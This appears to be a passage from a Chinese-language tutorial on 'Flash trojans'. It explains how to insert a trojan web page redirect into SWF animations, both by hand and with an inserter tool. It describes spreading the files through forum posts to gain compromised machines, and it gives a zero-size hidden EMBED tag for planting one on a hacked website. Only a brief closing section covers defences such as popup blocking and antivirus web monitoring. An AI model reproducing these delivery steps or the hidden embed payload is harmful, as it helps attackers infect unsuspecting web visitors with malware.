Flash木马分析与防范

步骤三：生成Flash木马

设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马，可以看到随着Flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。

三、简简单单生成Flash木马

上面插入木马的过程比较麻烦，下面我们介绍一个简单的方法，也正是这些简单的工具使得Flash木马在网上随处可见。

运行SWF木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的SWF文件；在“插入代码”中输入木马网页的地址；切记不要勾选下面的“只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用IE打开生成的动画，可以看到自动跳转到木马网页去了。

四、Flash木马的利用

看到上面的步骤了吧，生成一个Flash动画木马是不是很简单？那么生成的Flash木马该如何应用呢？只要我们将Flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。

大部分的论坛中都可以发来Flash动画的帖子，利用论坛发帖，攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例，在发帖或回复时，点击编辑窗口上方的“插入Flash动画”按钮，设置Flash窗口大小，使用默认设置后，要求输入Flash的URL地址。确定后，可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””，这就是完整的Flash播放代码了，不同的论坛代码是不一样的。

应用二：网页嵌入Flash木马

攻击者入侵了某个大的网站之后，很可能在网站首页挂马，使用普通方式挂马会被管理员发觉，但是挂上Flash木马的话，是很难查杀的。攻击者可能在网页中插入如下代码：

“《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”，其中的《》改为<>。

这里的参数“width=0 height=0”表示，Flash播放窗口为零，也就是不显示Flash播放窗口。其它用户浏览网页时，就会莫名其妙的弹出一个木马网页窗口。

五、关于Flash木马的防范

其实不管Flash木马有多么的巧妙，最终都是要跳转到木马网页去的，也就是说我们最终要防范的还是网页木马。了解了思路，对于Flash动画木马就简单了：

首先，要开启Windows XP SP2的窗口拦截窗口功能，或安装其它防弹出窗口的插件。如果那个漏网之鱼，莫名其妙弹出的网页窗口要及时的关闭。另外，一定要在上网浏览时开启杀毒软件的网页监控功能，只要网页木马在后台一下载到本地硬盘，就会被杀毒软件查杀，这样就万事无忧了！